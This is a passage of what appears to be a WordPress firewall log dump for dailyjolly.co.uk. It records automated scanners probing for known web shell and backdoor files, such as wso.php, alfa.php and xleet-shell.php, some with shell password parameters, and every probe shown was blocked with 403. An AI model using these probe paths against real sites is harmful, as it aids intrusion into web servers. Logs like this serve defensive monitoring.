(KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','pcTfARH0sDdj5ir4YExIVqag',0,1673897457.0382,191,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ApuydZizQUl4DfmOGM9JnK5j',0,1673897457.4423,201,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','n5NHUJhI1sXQgpyvV63zw8Sm',0,1673897457.8488,186,'','GET',403,0,700,0,1,'',0),('20.51.247.40',338949928,'','https://dailyjolly.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','syJboStUIqP0p5EQnDir78eV',0,1673897458.2688,169,'','GET',403,0,700,0,1,'',0),('91.239.157.179',1542430131,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','m1a9PzrMVuTcSYWAeidgDy5b',0,1673898019.6723,642,'','GET',403,0,700,0,1,'',0),('91.239.157.179',1542430131,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','wvG8UZfMdcxVq6migbyIuzEN',0,1673898023.1235,287,'','GET',403,0,700,0,1,'',0),('91.239.157.179',1542430131,'','https://www.dailyjolly.co.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','lFb7L6DUMQypAidaZN5YmVSE',0,1673898024.4568,178,'','GET',403,0,700,0,1,'',0),('91.239.157.179',1542430131,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','e3nHh8lkQp46VixTBMPvuArs',0,1673898028.9161,228,'','GET',403,0,700,0,1,'',0),('91.239.157.179',1542430131,'','https://www.dailyjolly.co.uk/wp-content/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Mu3Xocp2l48iNTKqafRrxBC5',0,1673898029.5026,249,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.dailyjolly.co.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','UfQYa07cdTNmp59nCOrbF2VR',0,1673898067.7914,210,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ROY2xgLW8QMqD5mI1uGteJAn',0,1673898144.1959,293,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','3TOYGsURhQwC6tjvnzJD9ifX',0,1673898144.9767,180,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','XkSYvrwua93QymFEZUnqBLHl',0,1673898146.0240,173,'','GET',403,0,700,0,1,'',0),('91.239.157.219',1542430171,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','bv6zIjUAB72GhJVPog1yTZ4H',0,1673898170.1726,236,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/seoplugins\\/mar.php\"}','tcy2YA45oXgpbESjuFa0QhIq',0,1673898320.9458,214,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/seotheme\\/mar.php\"}','rLKDI36b7C4P0hcsJ1tan8GO',0,1673898322.0087,225,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/ioptimization\\/IOptimize.php?rchk\"}','PoR7pdb1T5crWeE4zFmDSitq',0,1673898327.4067,1201,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/alera\\/alpha.php\"}','I2vKTwe0ghFb6W8sBlinqNJf',0,1673898329.0229,1146,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','OF8AoTtfmv9yIMjxQK6kwbnS',0,1673898330.6183,469,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wp\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','sRvhTAyt4YJd3X82NOSBgk0m',0,1673898331.6255,418,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/wordpress\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','STk6BqQhtIpURoNxeXr0MmF3',0,1673898332.4586,814,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/blog\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','gsMSyPHuC1cQz28dqEFZteaW',0,1673898333.6899,376,'','GET',403,0,700,0,1,'',0),('45.248.151.22',771266326,'','https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/site\\/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282\"}','KifukGxdJpYEAQWz4D9blFVj',0,1673898334.4737,892,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Gjazw0FlCvMpLZePfr9gd4hu',0,1673898472.5960,1811,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','e81YgKGTbqvkhNJ9xuDR0aHB',0,1673898498.9816,196,'','GET',403,0,700,0,1,'',0),('91.238.82.83',1542345299,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','dDr8wYUZRQXt0uy4AbLsmz7M',0,1673898499.9462,165,'','GET',403,0,700,0,1,'',0),('172.174.106.89',2897111641,'','https://dailyjolly.co.uk/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','RGMIJWDHkY6E7safdzb0yreX',0,1673904678.1262,213,'','POST',403,0,700,0,1,'',0),('172.174.106.89',2897111641,'','https://dailyjolly.co.uk/wsgqsjlx.php?Fox=d3wL7','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','uPY9aQjoJBLr0c8xGZ12RqnM',0,1673904678.4186,186,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/1index.php','','{\"1\":\"python-requests\\/2.28.1\"}','LZjVIUoCy71Md2exciA5YwrR',0,1673906085.6036,204,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/2index.php','','{\"1\":\"python-requests\\/2.28.1\"}','ZnCxuasbpLqOjU6mPYTWfrVh',0,1673906085.8900,177,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/3index.php','','{\"1\":\"python-requests\\/2.28.1\"}','fOlrTx4UmCVZBts8niJLdH1I',0,1673906086.1668,175,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','RDkJM2oUT7p5uGWyHgvh4r9F',0,1673906086.4576,236,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/content.php','','{\"1\":\"python-requests\\/2.28.1\"}','lYiOrCmDSEp6AgRMxaskTKIw',0,1673906086.7845,164,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/old-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','rEJdLQV6u7K3HY1hwOGC2tcf',0,1673906087.0847,195,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/new-index.php','','{\"1\":\"python-requests\\/2.28.1\"}','mx3H9z50Zyr4whOQtp2RLeJ1',0,1673906087.3756,185,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','g5GzKSyhn0ldpo9uabNms1VD',0,1673906087.6664,160,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/xm.php','','{\"1\":\"python-requests\\/2.28.1\"}','auy1DKiRc6Mg0tH24Owq3beZ',0,1673906087.9558,160,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','X6auoNO7zCec3dUVwEKLMmj2',0,1673906088.2208,166,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"python-requests\\/2.28.1\"}','Ao28tNVXlQ0RyknrUqYc6EOm',0,1673906088.4886,218,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/media-admin.php','','{\"1\":\"python-requests\\/2.28.1\"}','uAE3qQfnvaKLPJhU6picRIxt',0,1673906088.8250,182,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/mt/pekok.php','','{\"1\":\"python-requests\\/2.28.1\"}','UFoc3wagHW0qhmj1MyrfXJIT',0,1673906089.0898,173,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"python-requests\\/2.28.1\"}','WqlmEciCfp0gDwUrM9QnXR6T',0,1673906089.3511,163,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','MN4C7Kv1P3gFf8YV5UdOcbxz',0,1673906089.5924,164,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/.cgi/cache/index.php','','{\"1\":\"python-requests\\/2.28.1\"}','aeUDCgTdoALPJ5VktnHWclfZ',0,1673906089.8465,177,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','DrxnIvWb14OcJpyKl6BkhYtM',0,1673906090.1407,166,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/fox.php','','{\"1\":\"python-requests\\/2.28.1\"}','7YioghTayJAc14LebZDVOKMz',0,1673906090.4043,215,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"python-requests\\/2.28.1\"}','v64XImSynjpPDiaeZTK0O5Ls',0,1673906090.7237,168,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','orUSBu14JzmT2yKhj3qgZiVw',0,1673906090.9766,168,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','SYw43r1ybuAQJl2ICqDzF5E7',0,1673906091.6061,165,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/wp-atom.php','','{\"1\":\"python-requests\\/2.28.1\"}','aL5NOmh4oRIE3bCBAlctU0Te',0,1673906091.8483,177,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/export.php','','{\"1\":\"python-requests\\/2.28.1\"}','gnPKDUvE4qujJlWORCmh7A5c',0,1673906092.1330,172,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/images/wp-blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','7gHQXtA1dhC8NzMebKWLSFyi',0,1673906092.4049,196,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','1qZfNAP5Mjrz9C6O0QaxIX4G',0,1673906092.6743,204,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"python-requests\\/2.28.1\"}','oQWXeDskZqGnCIcyR4O7Tg0L',0,1673906092.9793,176,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','Eo8jQMgTHRvn2FdUWhcOIYSV',0,1673906093.2810,175,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/alwso.php','','{\"1\":\"python-requests\\/2.28.1\"}','7OZvagjcPXJ3sMuNo4qVCBkT',0,1673906093.5993,175,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/shx.php','','{\"1\":\"python-requests\\/2.28.1\"}','y2OkYJlgZu8pncfKG9HqiI3v',0,1673906093.9364,222,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-admin/includes/class-wp-media-list-data.php','','{\"1\":\"python-requests\\/2.28.1\"}','QiyBsHJWCTZ6c8jmGOvFhKYk',0,1673906096.3878,164,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/shell20220621.php','','{\"1\":\"python-requests\\/2.28.1\"}','BW5Pka0JcVHOR8zXoSFpQDwn',0,1673906098.6976,181,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/lufix.php','','{\"1\":\"python-requests\\/2.28.1\"}','71uHtUr4RnphIDZbgTScaksL',0,1673906099.0322,155,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','eyQpouDxqn3hc9m5jbd0Af1L',0,1673906101.1911,171,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"python-requests\\/2.28.1\"}','OQNHtqpgJYZ23GBolEnmy4ek',0,1673906101.5813,188,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/alfa.php','','{\"1\":\"python-requests\\/2.28.1\"}','0S5U7TEnvcIzjF6gLXtfOJCZ',0,1673906101.8614,264,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-content/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','jxWUPvEoB09J3eqQOp2gFXkK',0,1673906104.3859,161,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-admin/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','swvufD3CgmHGbOWZJEe98NTk',0,1673906104.9576,204,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','daJ4N7tEjDlyHsSA9K2BiwXT',0,1673906105.3024,171,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"python-requests\\/2.28.1\"}','ANrR9Iyej1pCv6BkP0bmVG2S',0,1673906105.6269,171,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"python-requests\\/2.28.1\"}','XwYDyU76IWik83dONPvFmA5e',0,1673906105.9084,188,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"python-requests\\/2.28.1\"}','oANistC6LeGyMa4H8R9z73BV',0,1673906106.2357,183,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/autoload_classmap.php','','{\"1\":\"python-requests\\/2.28.1\"}','95tr67Tg8Diky0duBzvhW2Ia',0,1673906106.5756,169,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.28.1\"}','uPCRGvwk6Ay2J4c1XSd5jpfO',0,1673906106.9354,159,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/.tmb/cache/shz.php','','{\"1\":\"python-requests\\/2.28.1\"}','gkwdZ9cYiQKDBj3ANVh18qrH',0,1673906107.2860,183,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"python-requests\\/2.28.1\"}','uJ102KOwZ8V3nNmsrdqBEtvc',0,1673906107.6775,169,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"python-requests\\/2.28.1\"}','9ejYZES4VAI1iBP3phfCn5rx',0,1673906108.0907,199,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','sFdpMJE9a5GvjINH240xDLyC',0,1673906108.7590,175,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"python-requests\\/2.28.1\"}','VdnJcrsoZWLiuFUmxCEqXtAh',0,1673906109.0383,190,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/sym403.php','','{\"1\":\"python-requests\\/2.28.1\"}','cYBrCVsJOmNj9qIEKQ2FyWTh',0,1673906109.7511,168,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/wp-class.php','','{\"1\":\"python-requests\\/2.28.1\"}','XIYTz3r7txHhNPolgksUBiEF',0,1673906110.0805,190,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xmlrpcs.php','','{\"1\":\"python-requests\\/2.28.1\"}','0e6QuxojSIOLGbdPw5fCqFAa',0,1673906110.3587,164,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/0z.php','','{\"1\":\"python-requests\\/2.28.1\"}','5jF0a1SfO8CnoED2pKMxqdAV',0,1673906110.6157,204,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"python-requests\\/2.28.1\"}','sJ5KfTrgDNxa10OGZ2WEd8iu',0,1673906110.9050,173,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','XafCyxcp942DBPq5HkLvIiUe',0,1673906111.1476,170,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','3gC1OQhRjPA96b8tcUGondWI',0,1673906113.0368,189,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/indeeex.php','','{\"1\":\"python-requests\\/2.28.1\"}','vG3dLSk8jPhT0DalEHCoRnMp',0,1673906113.3164,169,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/ne.php','','{\"1\":\"python-requests\\/2.28.1\"}','6k7QDMtAxEVJbwNZ1zeLGqIX',0,1673906113.5693,191,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/ff.php?pass=shell','','{\"1\":\"python-requests\\/2.28.1\"}','9eRxgDsY5WHzVr3FIpE1qtd7',0,1673906113.8831,210,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/8.php','','{\"1\":\"python-requests\\/2.28.1\"}','GQsO7giNH1EzjLcTrvVFPSoX',0,1673906114.1726,191,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','4MhseYjiDNJL86b93Cq2aUko',0,1673906114.4527,168,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/IXR/hunt.php','','{\"1\":\"python-requests\\/2.28.1\"}','Jv1N9ShFgPGQ8Mqd4fIclC7k',0,1673906114.7720,161,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"python-requests\\/2.28.1\"}','cjoHMrQkCd9n43qyWgJwvfAb',0,1673906115.0067,189,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/1975.php','','{\"1\":\"python-requests\\/2.28.1\"}','lYAzXcNhvIqyOZwM7RrbmK9H',0,1673906115.2842,168,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/small.php','','{\"1\":\"python-requests\\/2.28.1\"}','yoXWzSxLR5IqbZMrU0J9mwQ3',0,1673906115.5316,165,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','meazIuLpb2nqrYUc65DTESMl',0,1673912560.2889,1750,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-content/theme/seotheme/db.php?u','','{\"1\":\"python-requests\\/2.28.1\"}','2Rd6ns1hMcz8aDvOqAGfwioH',0,1673912562.3098,1691,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','9dcvQ7ZNRPVBHjIbEWz0Yw2M',0,1673912578.8930,2024,'','GET',403,0,700,0,1,'',0),('4.233.59.82',82393938,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.28.1\"}','42PIVczX3qTG9SdlfYRmrAFO',0,1673912586.9796,1983,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','aL9k1SmfgsFb7CqZDJeiGHPn',0,1673916865.7427,216,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','cduCoZsKjwxteAOl2nqf95Lh',0,1673917004.0474,199,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','yVvJYjXKB2Gwp9nlb76CPa1L',0,1673917622.9380,236,'','GET',403,0,700,0,1,'',0),('5.161.41.233',94448105,'','https://www.dailyjolly.co.uk/wp-includes/fonts/css.php','','{\"1\":\"python-requests\\/2.27.1\"}','lfG5pAz3swIC74iF9Q81eatg',0,1673917627.9232,195,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','2ZJdOTMi0p9glGyQ3qbcAwD7',0,1673918840.6102,1732,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','8kunm0CVXptSxwci7TLrBEeR',0,1673920011.5588,1548,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','8sKIt0jCSlDczfwUhGX1idYW',0,1673920682.7266,1600,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.27.1\"}','ckN57TswoytX0iEMJP6QGD8S',0,1673921063.7930,1504,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','E9XJMlINYU7Hp4xaDART3jse',0,1673921412.2834,1681,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','j9QBoORuF5U6vly8IYseTmgf',0,1673921745.6281,834,'','GET',403,0,700,0,1,'',0),('38.54.89.235',641096171,'','https: